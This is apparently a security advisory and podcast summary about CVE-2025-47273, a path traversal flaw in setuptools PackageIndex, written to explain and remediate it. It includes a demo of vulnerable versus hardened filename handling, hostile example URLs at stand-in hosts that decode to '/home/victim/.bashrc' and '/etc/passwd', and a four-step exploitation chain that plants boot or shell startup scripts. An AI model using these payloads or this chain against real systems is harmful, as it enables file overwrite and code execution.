setuptools: path traversal in setuptools PackageIndex (CVE-2025-47273) #shorts

Summary

In today’s podcast we cover CVE-2025-47273, a path traversal vulnerability in setuptools, the Python package management library. Disclosed in May 2025 and fixed in version 78.1.1, this issue allows an attacker to write files to arbitrary locations on the filesystem with the permissions of the running process. Several SUSE distributions have released important security updates for python-setuptools, python310-setuptools, and python312-setuptools to address this flaw.

Product details

Setuptools is a widely used Python package that manages downloading, building, installing, upgrading, and uninstalling Python libraries and applications. It is the backbone of many Python development and deployment workflows. SUSE has issued security updates for the python-setuptools package across multiple versions (including python310-setuptools and python312-setuptools) to remediate the vulnerability in affected releases prior to 78.1.1.

Vulnerability type summary

This vulnerability is classified as CWE-22, an 'Improper Limitation of a Pathname to a Restricted Directory,' commonly known as a path traversal flaw. It occurs when user-controlled input influences file paths and the application fails to properly restrict or sanitize those paths, enabling access outside of the intended directory.

Details of the vulnerability

In setuptools versions before 78.1.1, `PackageIndex` builds the local filename for a download from the last path component of the download URL and joins it onto its temporary download directory without checking that the result still lies inside that directory. A download URL served by an attacker-controlled index page or file server can therefore steer the write to any path the Python process is able to create or overwrite, with that process's permissions. `PackageIndex` is the fetcher behind `easy_install`, `setup_requires` and `dependency_links`; a plain `pip install` uses pip's own downloader, so the exposure is to workflows in which setuptools itself retrieves distributions. Depending on where the file lands, the outcome is arbitrary code execution, data corruption, or denial of service, and because such installs frequently run as root or as a build-service account, successful exploitation can have serious consequences on affected systems.
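
The following Python is an added example, not code from setuptools or from the advisory. It re-creates the shape of the download-filename step in `PackageIndex` before and after the 78.1.1 fix so the escape can be seen directly: the pre-fix shape already collapses `..`, so the interesting input is a URL whose last path segment percent-encodes a slash and decodes to an absolute path, which `os.path.join` then uses as-is. The hardened variant keeps the same derivation and adds a containment check modelled on the idea of the upstream fix (resolve the path, refuse anything outside the download directory) but written independently here. The URLs and the download directory are constructed for illustration.

```python
import os
import urllib.parse

# Constructed inputs for the demonstration (not real hosts or paths).
TMPDIR = "/tmp/setuptools-download"
BENIGN_URL = "https://files.example.org/packages/simplepkg-1.0.tar.gz"
# '%2f' decodes to '/', so the last path segment becomes an absolute path.
HOSTILE_URL = "https://evil.example.org/%2fhome%2fvictim%2f.bashrc"
# A classic dot-dot payload: the pre-fix '..' loop neutralises this one.
DOTDOT_URL = "https://evil.example.org/..%2f..%2fetc%2fpasswd"


def filename_from_url(url: str) -> str:
    """Last path segment of the URL, percent-decoded.

    This is the general shape of how setuptools names a download: the name
    is whatever the remote server or index page put into the URL.
    """
    path = urllib.parse.urlparse(url).path
    return urllib.parse.unquote(path.split("/")[-1])


def sanitise_name(name: str) -> str:
    """Pre-78.1.1 style clean-up: collapse '..' and replace backslashes.

    This stops relative traversal but says nothing about absolute paths.
    """
    name = name or "__downloaded__"
    while ".." in name:
        name = name.replace("..", ".").replace("\\", "_")
    return name


def resolve_download_filename_unsafe(url: str, tmpdir: str) -> str:
    """Vulnerable shape: os.path.join discards tmpdir when name is absolute."""
    return os.path.join(tmpdir, sanitise_name(filename_from_url(url)))


def is_inside(root: str, candidate: str) -> bool:
    """True when candidate resolves to a location at or below root."""
    root_real = os.path.realpath(root)
    cand_real = os.path.realpath(candidate)
    return os.path.commonpath([root_real, cand_real]) == root_real


def resolve_download_filename_safe(url: str, tmpdir: str) -> str:
    """Hardened shape: same derivation, then refuse anything outside tmpdir."""
    candidate = os.path.join(tmpdir, sanitise_name(filename_from_url(url)))
    if not is_inside(tmpdir, candidate):
        raise ValueError(f"Invalid filename {candidate!r}: escapes {tmpdir!r}")
    return os.path.realpath(candidate)


if __name__ == "__main__":
    print("benign  :", resolve_download_filename_unsafe(BENIGN_URL, TMPDIR))
    print("dot-dot :", resolve_download_filename_unsafe(DOTDOT_URL, TMPDIR))
    print("hostile :", resolve_download_filename_unsafe(HOSTILE_URL, TMPDIR))
    try:
        resolve_download_filename_safe(HOSTILE_URL, TMPDIR)
    except ValueError as exc:
        print("rejected:", exc)
```

Running the block shows the benign and dot-dot URLs staying under the download directory in both variants, while the hostile URL resolves to `/home/victim/.bashrc` in the unsafe variant and is rejected by the safe one. The containment test uses `os.path.realpath` on both sides so that symlinked temp directories (for example `/tmp` on macOS) compare correctly.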

Conclusion

To protect your environment, upgrade setuptools to version 78.1.1 or later; on SUSE, apply the security updates for python-setuptools, python310-setuptools, and python312-setuptools without delay. Regularly review and apply security advisories for your Python tooling, and follow best practices for package validation and isolation, in particular avoiding builds that let setuptools fetch dependencies from untrusted hosts, to minimize risk.

Watch the full video on YouTube: CVE-2025-47273

Remediation and exploitation details

This chain involves the following actors

  • Attacker: Crafts and hosts a malicious package index payload
  • Python user: Installs packages using setuptools

The following systems are involved

  • setuptools PackageIndex (Downloads and unpacks Python packages): Component vulnerable to path traversal
  • Local filesystem (Stores installed files and packages): Target for arbitrary file writes

Attack entry point

  • PackageIndex.download: Code path in setuptools that retrieves and writes package files to disk

Remediation actions

  • Python user (Python environment): Upgrade setuptools to version 78.1.1 or later in every interpreter and virtual environment that builds or installs packages
  • Security team (Development pipeline): Restrict use of untrusted package indexes and enforce source validation, so that setup.py builds cannot pull dependencies from attacker-reachable hosts via setup_requires or dependency_links
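
As an added check, not part of the advisory or of SUSE's update, the following Python reports whether the setuptools in the current interpreter predates the fix. Only the fix version, 78.1.1, comes from the advisory; the version parsing, the treatment of pre-release suffixes and the sample version strings are assumptions made here. Run it once per environment (system Python, each virtualenv, each build image).

```python
import importlib.metadata
import re

# Version that closes CVE-2025-47273, per the advisory.
FIXED_VERSION = (78, 1, 1)

# Leading optional 'v', dotted numeric release, optional a/b/rc pre-release tag.
# Post-release and local suffixes ('.post1', '+local') are ignored: they do not
# move a release to the other side of 78.1.1.
_VERSION_RE = re.compile(r"^\s*v?(?P<release>\d+(?:\.\d+)*)(?P<pre>(?:a|b|rc)\d*)?")


def parse_version(version: str) -> tuple:
    """Return (release_tuple, prerelease_tag_or_empty) for a PEP 440-ish string."""
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    release = tuple(int(part) for part in m.group("release").split("."))
    return release, m.group("pre") or ""


def release_tuple(version: str) -> tuple:
    """Numeric release segment only: '80.9.0rc1' -> (80, 9, 0)."""
    return parse_version(version)[0]


def is_vulnerable(version: str) -> bool:
    """True when this setuptools release still carries CVE-2025-47273.

    Anything below 78.1.1 is affected. A pre-release of 78.1.1 itself
    (e.g. '78.1.1rc1') is treated as affected, assuming it predates the fix.
    """
    release, pre = parse_version(version)
    if release < FIXED_VERSION:
        return True
    return release == FIXED_VERSION and bool(pre)


def installed_setuptools_status() -> str:
    """One-line verdict for the interpreter running this code."""
    try:
        ver = importlib.metadata.version("setuptools")
    except importlib.metadata.PackageNotFoundError:
        return "setuptools: not installed in this environment"
    state = "VULNERABLE, upgrade to >= 78.1.1" if is_vulnerable(ver) else "fixed"
    return f"setuptools {ver}: {state}"


if __name__ == "__main__":
    print(installed_setuptools_status())
```

A distribution-patched build (for example SUSE's python-setuptools with the fix backported) may report a version string below 78.1.1 while not being affected; for those, trust the package manager's advisory status rather than this upstream-version comparison.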

Exploitation actions

Step 1: Path traversal via the download filename

  • Actor: Attacker
  • Action: Host a package index (or a download server an index links to) whose download URLs decode to a filename that resolves outside setuptools' download directory, for example by percent-encoding path separators so that the decoded name is an absolute path
  • System: setuptools PackageIndex
  • Examples:
      • A download link whose last path segment decodes to '/home/victim/.bashrc' or '/etc/init.d/malicious.sh' instead of 'simplepkg-1.0.tar.gz'

Step 2: Pointing the installer at the untrusted index

  • Actor: Python user
  • Action: Run an install in which setuptools fetches the distribution itself, such as easy_install, or a setup.py build whose setup_requires or dependency_links reference the attacker's index (a plain pip install uses pip's own downloader, not PackageIndex)
  • System: setuptools PackageIndex
  • Examples:
      • easy_install --index-url http://malicious.example.com simplepkg

Step 3: Writing files outside the intended directory

  • Actor: setuptools PackageIndex
  • Action: Join the URL-derived filename onto the temporary download directory without confirming that the result stays inside it, then write the downloaded content to the escaped path
  • System: Local filesystem
  • Examples:
      • Writing a script to '/etc/init.d/malicious.sh' or overwriting '~/.bashrc'

Step 4: Escalation to remote code execution

  • Actor: Attacker
  • Action: Trigger execution of the planted payload
  • System: Operating system startup or Python runtime
  • Examples:
      • Rebooting the system to run '/etc/init.d/malicious.sh' at boot, or waiting for the user's next interactive shell to source '~/.bashrc'

Related Content

CVE database technical details

  • CVE ID: CVE-2025-47273
  • Description: setuptools is a package that allows users to download, build, install, upgrade, and uninstall Python packages. A path traversal vulnerability in `PackageIndex` is present in setuptools prior to version 78.1.1. An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to remote code execution depending on the context. Version 78.1.1 fixes the issue.
  • Provider: GitHub_M
  • CWE / problem types: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
  • Affected software versions: pypa:setuptools, all versions < 78.1.1 (affected)
  • Date published: 2025-05-17T15:46:11.399Z
  • Last updated: 2025-05-28T15:03:15.516Z